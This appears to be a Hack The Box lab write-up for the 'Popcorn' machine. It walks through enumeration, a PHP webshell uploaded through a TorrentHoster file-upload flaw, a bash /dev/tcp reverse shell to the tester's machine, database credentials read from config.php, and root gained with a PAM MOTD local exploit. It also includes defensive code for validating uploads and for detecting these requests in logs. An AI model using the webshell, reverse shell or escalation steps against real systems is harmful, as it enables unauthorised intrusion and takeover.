Popcorn @ hackthebox

Popcorn is a relatively easy Linux machine, although the initial foothold is not very straightforward; you need to dig a bit to find it. Because this machine is running a pretty old Ubuntu version, there is more than one way to escalate privileges.

Enumeration

First, let's start nmap.

┌─[root@parrot]─[/home/luka/Desktop/htb/Popcorn/nmap]
└──╼ #nmap -sC -sT -oA nmap -n 10.10.10.6
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-20 20:39 CET
Nmap scan report for 10.10.10.6
Host is up (0.052s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http
|_http-title: Site doesn't have a title (text/html).
Nmap done: 1 IP address (1 host up) scanned in 2.25 seconds

Since on hackthebox default credentials do not work for SSH and bruteforcing is not the way to go (we don't even know the username), enumerating the web server seems like the only way forward. Directory enumeration will be done with gobuster (https://github.com/OJ/gobuster).

┌─[✗]─[root@parrot]─[/home/luka/Desktop/htb/Popcorn/nmap]
└──╼ #/home/luka/tools/gobuster/gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -u http://10.10.10.6
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
[+] Mode : dir
[+] Url/Domain : http://10.10.10.6/
[+] Threads : 10
[+] Wordlist : /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
2019/03/20 20:53:10 Starting gobuster
/index (Status: 200)
/test (Status: 200)
/torrent (Status: 301)
/rename (Status: 301)
2019/03/20 20:59:31 Finished

Checking the directories found, /test reveals some information about the machine. This is definitely valuable information.

Exploitation / Initial Foothold

The directory /torrent on the other hand seems to be hosting some torrent web portal.

In the footer we can find the following information:

Copyright © 2007 TorrentHoster.com. All rights reserved

If we search Google for torrenthoster we will surely find the following page: https://packetstormsecurity.com/files/87275/Torrent-Hoster-XSS-Shell-Upload.html . According to this page, "torrenthoster" has some upload vulnerabilities. All of them require authenticated access though.

It seems we can create a user: simply sign up and log in with the newly created account.

There is an upload vulnerability.

We could try different file types, but they are not going to be uploaded: the application is actually doing some background checks on the torrent file. As soon as a file is uploaded, you will see some metadata about the torrent as well. We do, however, have another possibility: uploading our code as a screenshot.

If Burp (or a comparable alternative) is not already running, we should start it in order to intercept the upload and be able to change the headers.

To switch proxies in Firefox simply and quickly, I use the FoxyProxy extension with the following settings:

Of course setting up FoxyProxy is not enough; you also have to make sure that Burp is set to intercept and FoxyProxy is activated. Intercepting a legitimate jpg upload first will make crafting the malicious PHP file later easier. We need to copy enough characters (bytes) to make the application believe that we are uploading a jpg. (You can read more about magic bytes here: https://blog.netspi.com/magic-bytes-identifying-common-file-formats-at-a-glance/)

We can send the HTTP request to Repeater, but it is also going to be saved in Burp under Target > Site map.

We can now upload our shell simply by pasting PHP code after the magic bytes plus some random bytes. I used the very simple PHP code <?php echo system($_REQUEST['cmd']); ?>. I also changed the file name to cmd.jpg.php and the Content-Type to image/jpeg. This way we can bypass more than one upload blocking mechanism.
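
Seen from the application's side, each of the three tricks above (JPEG magic bytes, a double extension, a client-chosen Content-Type) defeats one weak check. The following is an added example, not TorrentHoster's own code: a stdlib Python model of the kind of check the bypass targets, next to a hardened version of the same validation. File names, byte strings and the function names weak_check/strong_check are constructed for the demonstration.

```python
"""
Model of the upload checks that the cmd.jpg.php bypass defeats, next to a
hardened version. Example code added to this write-up, not TorrentHoster's
own code; file names, byte strings and function names are constructed.
"""
import os
import re
import secrets

JPEG_MAGIC = b"\xff\xd8\xff"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
ALLOWED = {".jpg": JPEG_MAGIC, ".jpeg": JPEG_MAGIC, ".png": PNG_MAGIC}
PHP_OPEN_TAG = re.compile(rb"<\?")  # also catches the short forms "<?" and "<?="

# Constructed uploads: a real-looking JPEG header, and the write-up's shell
# one-liner pasted behind JPEG magic bytes plus some padding bytes.
REAL_JPEG = JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00" + b"\x00" * 32
WEBSHELL_UPLOAD = JPEG_MAGIC + b"\x00" * 16 + b"<?php echo system($_REQUEST['cmd']); ?>"


def weak_check(filename: str, content_type: str, data: bytes) -> bool:
    """The style of check the bypass targets: trust the client's Content-Type,
    accept any name that merely contains an image extension, and only glance
    at the magic bytes. Returns True when the upload is accepted."""
    has_image_ext = any(ext in filename.lower() for ext in ALLOWED)
    has_magic = data.startswith(JPEG_MAGIC) or data.startswith(PNG_MAGIC)
    return content_type.startswith("image/") and has_image_ext and has_magic


def strong_check(filename: str, data: bytes):
    """Hardened validation. The client-supplied Content-Type is ignored
    entirely. Returns a server-generated file name to store under, or None
    if the upload is rejected."""
    root, ext = os.path.splitext(os.path.basename(filename))
    ext = ext.lower()
    if ext not in ALLOWED:
        return None                       # cmd.jpg.php: final extension is .php
    if "." in root:
        return None                       # cmd.php.jpg: no second extension either
    if not data.startswith(ALLOWED[ext]):
        return None                       # extension and magic bytes must agree
    if PHP_OPEN_TAG.search(data):
        return None                       # code hidden behind a valid image header
    # The client never chooses the stored name or its extension.
    return secrets.token_hex(8) + ext


if __name__ == "__main__":
    print("weak  :", weak_check("cmd.jpg.php", "image/jpeg", WEBSHELL_UPLOAD))  # accepted
    print("strong:", strong_check("cmd.jpg.php", WEBSHELL_UPLOAD))             # rejected
    print("strong:", strong_check("photo.jpg", REAL_JPEG))                     # random name
```

The PHP-tag scan is only a cheap tripwire (binary image data can contain "<?" by chance); the robust controls are to re-encode the image server-side so payload bytes never survive, to store uploads under a server-generated name, and to serve the upload directory with script execution disabled so that even a file that slips through is never interpreted.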

I ran gobuster again against http://10.10.10.6/torrent/ to crawl this directory, since we need to find the upload folder to run the script (and check whether it was uploaded at all).

┌─[root@parrot]─[/home/luka/Desktop/htb/Popcorn/nmap]
└──╼ #/home/luka/tools/gobuster/gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -u http://10.10.10.6/torrent -x php
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
[+] Mode : dir
[+] Url/Domain : http://10.10.10.6/torrent/
[+] Threads : 10
[+] Wordlist : /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : php
[+] Timeout : 10s
2019/03/20 21:28:15 Starting gobuster
/images (Status: 301)
/download (Status: 200)
/download.php (Status: 200)
/index (Status: 200)
/index.php (Status: 200)
/rss (Status: 200)
/rss.php (Status: 200)
/login (Status: 200)
/login.php (Status: 200)
/templates (Status: 301)
/users (Status: 301)
/admin (Status: 301)
/health (Status: 301)
/browse (Status: 200)
/browse.php (Status: 200)
/comment (Status: 200)
/comment.php (Status: 200)
/upload (Status: 301)
/upload.php (Status: 200)
/css (Status: 301)
/edit (Status: 200)
/edit.php (Status: 200)
/lib (Status: 301)
/database (Status: 301)

We could have found the /upload folder just by guessing as well. Either way, our file was uploaded and it can be run.

Code execution is successful (see the output of the command cmd=whoami). We can also change the request method to POST to make the requests more readable and easier to modify.

Reverse shell command used: bash -i >& /dev/tcp/10.10.14.68/5555 0>&1

The command can be URL-encoded in Burp with CTRL+U (if using GET).

To check whether the attacker's machine can be reached, we can run a ping from the target and start tcpdump with an ICMP filter on our side.

Since the ping reaches the attacker's (our) machine, we can try to get a shell now.
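
From the web server's side, the requests made in this section leave a distinctive trail in the access log. The following is an added example, not anything from the target or the author: detection logic in stdlib Python run over constructed Apache combined-log lines that resemble the whoami test, the switch to POST and the reverse-shell request above. The rule names and the 10.10.14.71 "normal user" lines are made up for the example.

```python
"""
Detection over Apache access-log lines for the requests made in this section.
Example code added to this write-up, not from the target or its author; the
log lines and rule names are constructed for the demonstration.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log (combined log format). Line 3 is the write-up's
# reverse-shell command URL-encoded; line 2 shows that a POST body is not logged.
SAMPLE_LOG = """\
10.10.14.68 - - [20/Mar/2019:21:40:02 +0100] "GET /torrent/upload/cmd.jpg.php?cmd=whoami HTTP/1.1" 200 231 "-" "Mozilla/5.0"
10.10.14.68 - - [20/Mar/2019:21:41:15 +0100] "POST /torrent/upload/cmd.jpg.php HTTP/1.1" 200 231 "-" "Mozilla/5.0"
10.10.14.68 - - [20/Mar/2019:21:42:30 +0100] "GET /torrent/upload/cmd.jpg.php?cmd=bash%20-i%20%3E%26%20/dev/tcp/10.10.14.68/5555%200%3E%261 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.71 - - [20/Mar/2019:21:43:01 +0100] "GET /torrent/upload/1a2b3c4d.jpg HTTP/1.1" 200 84812 "-" "Mozilla/5.0"
10.10.14.71 - - [20/Mar/2019:21:43:05 +0100] "GET /torrent/browse.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
UPLOAD_DIRS = ("/torrent/upload/", "/torrent/images/")   # should hold images only
SCRIPT_EXT = re.compile(r"\.ph(?:p\d?|tml|ar)(?:$|\.)", re.IGNORECASE)
DOUBLE_EXT = re.compile(r"\.(?:jpe?g|png|gif)\.php", re.IGNORECASE)
SHELL_CMD = re.compile(r"/dev/tcp/|\bbash -i\b|\b(?:whoami|id|uname)\b")


def analyze(log_text: str):
    """Return (ip, method, path, [rule names]) for every line that trips a rule."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        path = unquote(url.path)
        hits = []
        # A script being served from a directory that should contain only images.
        if path.startswith(UPLOAD_DIRS) and SCRIPT_EXT.search(path):
            hits.append("script-in-upload-dir")
        # The image-extension-then-.php naming trick used in this write-up.
        if DOUBLE_EXT.search(path):
            hits.append("double-extension")
        # Shell syntax in a query parameter. This only sees GET requests: POST
        # bodies are not in the access log, which is why the path rules matter.
        if any(SHELL_CMD.search(v) for vals in parse_qs(url.query).values() for v in vals):
            hits.append("shell-command-in-query")
        if hits:
            findings.append((m["ip"], m["method"], path, hits))
    return findings


if __name__ == "__main__":
    for ip, method, path, hits in analyze(SAMPLE_LOG):
        print(f"{ip} {method} {path}: {', '.join(hits)}")
```

The POST line is the instructive one: once the command moves out of the query string the access log no longer shows it, so a detection that only greps for shell syntax misses the later activity, while the two path-based rules still flag every request to the planted file. On the network side, the ping and the outbound connection to port 5555 from a web server are the matching signals for the tcpdump step above.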

We've got a shell. We should now upgrade it to a fully interactive shell: press CTRL+Z to background the process, run stty raw -echo, then type fg (no output will be shown) and press Enter.

Privilege Escalation

There are some credentials in /var/www/torrent/config.php.

Connect to the database with mysql -u torrent -D torrenthoster -p and enter the SuperSecret!! password. I couldn't find anything useful in the database, apart from the hash of the admin user, which I couldn't crack.

We can read the user flag.

www-data@popcorn:/var/www/torrent$ ls -la /home/george/
total 872
drwxr-xr-x 3 george george 4096 Mar 17 2017 .
drwxr-xr-x 3 root root 4096 Mar 17 2017 ..
-rw------- 1 root root 2769 May 5 2017 .bash_history
-rw-r--r-- 1 george george 220 Mar 17 2017 .bash_logout
-rw-r--r-- 1 george george 3180 Mar 17 2017 .bashrc
drwxr-xr-x 2 george george 4096 Mar 17 2017 .cache
-rw------- 1 root root 1571 Mar 17 2017 .mysql_history
-rw------- 1 root root 19 May 5 2017 .nano_history
-rw-r--r-- 1 george george 675 Mar 17 2017 .profile
-rw-r--r-- 1 george george 0 Mar 17 2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 Mar 17 2017 torrenthoster.zip
-rw-r--r-- 1 george george 33 Mar 17 2017 user.txt
www-data@popcorn:/var/www/torrent$ cat /home/george/user.txt
*deleted*

I ran the LinEnum scripts, but I couldn't find anything at first sight apart from the most obvious information: the machine is running a very old Ubuntu version. There is a high probability that it is vulnerable to the Dirty COW exploit (https://dirtycow.ninja/).

www-data@popcorn:/home/george$ uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
www-data@popcorn:/home/george$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=9.10
DISTRIB_CODENAME=karmic
DISTRIB_DESCRIPTION="Ubuntu 9.10"

I did, however, find an exploit simply by checking searchsploit/exploit-db for "ubuntu 9.10". It has to do with MOTD (Message Of The Day) file tampering. We can find MOTD in the .cache folder in /home/george/.cache/, so we know it is installed. (https://www.exploit-db.com/exploits/14339)

┌─[luka@parrot]─[~/Desktop/htb/Popcorn]
└──╼ $searchsploit ubuntu 9.10

------------------------------------------------------ ----------------------------------
 Exploit Title                                        |  Path
                                                      | (/usr/share/exploitdb/)
------------------------------------------------------ ----------------------------------

Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampe | exploits/linux/local/14273.sh
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampe | exploits/linux/local/14339.sh
ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9 | exploits/linux/local/12130.py

Shellcodes: No Result
Papers: No Result

We can read the exploit with searchsploit -x 14339 and copy it from /usr/share/exploitdb/exploits/linux/local/14339.sh . I transferred the exploit to the Popcorn machine using wget.

If you copied this exploit like I did, you will definitely need to remove the carriage returns with sed -i 's/\r//' 14339.sh and make it executable with chmod +x 14339.sh.

www-data@popcorn:/tmp$ chmod +x 14339.sh
www-data@popcorn:/tmp$ sed -i 's/\r//' 14339.sh
www-data@popcorn:/tmp$ bash 14339.sh
[*] Ubuntu PAM MOTD local root
[*] SSH key set up
[*] spawn ssh
[+] owned: /etc/passwd
[*] spawn ssh
[+] owned: /etc/shadow
[*] SSH key removed
[+] Success! Use password toor to get root
Password:
root@popcorn:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@popcorn:/tmp# cat /root/root.txt
*deleted*

We've got root access and can read the flag.